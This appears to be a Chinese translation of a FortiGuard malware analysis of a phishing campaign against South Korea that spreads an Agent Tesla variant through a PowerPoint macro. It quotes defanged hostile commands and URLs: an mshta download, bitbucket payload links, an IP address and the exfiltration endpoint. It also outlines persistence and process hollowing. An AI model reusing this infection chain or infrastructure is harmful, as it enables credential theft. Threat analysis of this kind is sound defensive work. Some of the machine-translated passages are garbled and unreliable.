Fortinet FortiGuard实验室最近发现了针对韩国的网络钓鱼攻击。电子邮件是用韩语写的，要求收件人打开附件中的PowerPoint文件查看采购订单。这个恶意的PowerPoint文件将传播特斯拉特工的新变种。

自2014年发现智能体特斯拉以来，一直非常活跃，很多品种层出不穷。代理特斯拉是一个写在。Net，主要用于从丢失的主机上窃取敏感信息，如剪贴板数据、键盘按键记录、软件凭证(浏览器、邮件、VPN、FTP、即时通讯软件等)。)，屏幕截图等。

00-1010邮件中的韩文试图引诱收件人打开附件确认采购订单。

钓鱼邮件

钓鱼邮件

PowerPoint文件包含一个名为Auto_Open()的宏代码，打开文件时会调用该宏代码。

VBA法典如下：

Soraj是UserForm控件的名称，bear是soraj中CheckBox控件的名称。攻击者调用Shell来执行从bear控件的GroupName属性读取的命令。

复选框内容

如上所示，soraj.bear.GroupName的值为mshtahxxp [:]/bitly [。] com/gdhamksgdsadj。

该命令由mshta和一个网址组成。mshta可用于执行HTML应用程序文件、VBScript脚本等。当网址打开时，它将被重定向到其他网址(hxps[:]/one daywilloeyyouforever[。]blogspot.com/p/divine 111 . html)。该响应包含一个VBScript代码，用于将转义的代码写入由mshta.exe执行的当前HTML文件。

请求交互

如上图，在响应数据中可以看到URL重定向和转义的VBScript代码。

这个VBScript代码叫做VBScript-嵌入在HTML中，一些无与伦比的代码如下：

部分VBScript代码

00-1010攻击者在传播代理特斯拉的过程中使用了各种脚本，包括VBScript-嵌入HTML、VBScript和PowerShell，用于各种目的。

恶意 PowerPoint

恶意软件每两小时请求一个新版本，并在倒下的主机上执行。为此，嵌入在HTML中的VBScript执行命令，将其添加到计划任务中。创建执行计划的命令如下：

ttps://p5.toutiaoimg.com/large/tos-cn-i-qvj2lq49k0/6c65dca81147473cb2b38918523cd332" alt="网络钓鱼攻击瞄准韩国，传播Agent Tesla新变种">

定时任务持久化

在远程 HTML 文件中执行 VBScript 代码，会下载 Agent Tesla 到失陷主机，检测并终止正在运行的 Agent Tesla 进程，以进行升级。

持久化

从 VBScript-embedded-in-HTML 中提取的独立 VBS 文件 %Public%\hulalalMCROSOFT.vbs 会从 hxxps[:]//bitbucket[.]org/!api/2.0/ 下载另一个 base64 编码的 VBS 代码片段 /hogya/5X7My8/b271c1b3c7a78e7b68fa388ed463c7cc1dc32ddb/files/divine1-2 到本地。通过 base64 解码后，VBS 代码将会被保存到位于 %Public% 文件夹下的 UYA-update.vbs 文件中。

这个 VBS 代码片段会下载 Agent Tesla 并在失陷主机上执行。无论何时执行该 VBS 文件，都会启动 Agent Tesla。

为了维持持久化，Agent Tesla 会将 UYA-update.vbs 文件复制到 Startup 文件夹中并重命名为 GTQ.vbs，这能够使其在系统启动时自启动。

VBS 脚本文件

Process Hollowing

UYA-update.vbs 根据本地变量在 base64 解码出的 PE 文件中提取 PowerShell 代码，再调用 PowerShell.exe 执行。PE 文件是一个 .NET 程序，其中包含一个属于 ClassLibrary3.Class1 类、名为 Run() 的函数。

调用函数的 PowerShell 代码，如下所示：

$fuUN 从解码的 .NET 文件中调用 GetType() 和 GetMethod() 来获取函数 ClassLibrary3.Class1.Run() 并通过 Invoke() 调用 Run() 函数，执行的参数是一个 URL，具体为 hxxps[:]//bitbucket[.]org/!api/2.0/snippets/hogya/nxq8od/c73df176f221868c33d4b3033ec04dc173d4ba4c/files/divine1-1。

函数 ClassLibrary3.Class1.Run() 的完整代码如下所示：

.NET 函数代码

调用函数 ClassLibrary3.Class1.Run() 后，通过链接下载 hxxp[:]//149.56.200.165/rump/1.txt（执行 Process Hollowing 的 .NET 模块）和 hxxps[:]//bitbucket[.]org/!api/2.0/snippets/hogya/nxq8od/c73df176f221868c33d4b3033ec04dc173d4ba4c/files/divine1-1（Agent Tesla）。

Agent Tesla 在失陷主机上采用无文件执行，只存在于 PowerShell 进程的内存中。另一个 .NET 模块负责执行 Process Hollowing 的函数为 ClassLibrary1.Class1.Run()，并且针对 RegAsm.exe 执行 Agent Tesla。

RegAsm.exe 是 Microsoft .Net Framework 的官方组件，攻击者将恶意软件注入其中规避检测。

.NET 模块中调用了许多 Windows API 函数将 Agent Tesla 注入目标进程。

Agent Tesla 执行后就会窃取受害者的私密信息。

Agent Tesla

Agent Tesla 对外发布了 Setup 程序，可以根据攻击者启用的功能编译 Agent Tesla 程序。

Agent Tesla 可以通过 Main()（凭据窃取）、Timer（窃取剪贴板、屏幕截图等）和 Thread（通过浏览器窃取 Cookie）等函数启动需要执行的功能。

捕获的 Agent Tesla 变种只启用了凭据窃取与 Cookie 窃取功能，支持的客户端超过 70 个，如下所示：

部分代码示意图

窃取信息示意图

上图显示了刚从 IceCat 程序窃取的凭据，Browser 是客户端名称、Password 是保存的密码、URL 是登录页面、UserName 是保存的用户名。

窃取的凭据保存在全局变量中，格式化后回传给攻击者。

数据回传

Agent Tesla 支持四种方式将窃取数据回传给攻击者，分别是 FTP、HTTP POST、SMTP、Telegram。

捕获的变种使用了 HTTP POST 方式。Agent Tesla 首先使用 DES 将数据加密，再利用 base64 编码后通过 HTTP POST 请求发送给攻击者。Agent Tesla 向硬编码的字符串 hxxp[:]//69[.]174.99[.]181/webpanel-divine/mawa/7dd66d9f8e1cf61ae198.php 发送请求。

回传数据包

如上所示，Agent Tesla 将窃取的数据作为 p= 的值进行发送。

数据头中包含失陷主机的基本信息：“数据包编号”+“分隔符”+“受害者ID”+“分隔符”+“日期和时间”+“分隔符字符串”+“用户名/计算机名”+“分隔符”，后续紧跟着被窃取的信息。

回传信息格式

如上所示，为一个编号为 6 的数据包示例。分割字符串为 0de264895c1ed90486c73c6eb110af6c2222264a0854b0047b9ead88b718f7d0，受害者 ID 是根据系统硬件信息生成的 MD5 哈希。

Agent Tesla 共提供了七种数据包进行数据回传：

结论

这次的钓鱼攻击针对韩国用户展开，攻击会传播 Agent Tesla 的一个新变种，并且回传相关信息给攻击者。

IOC

参考来源

Fortinet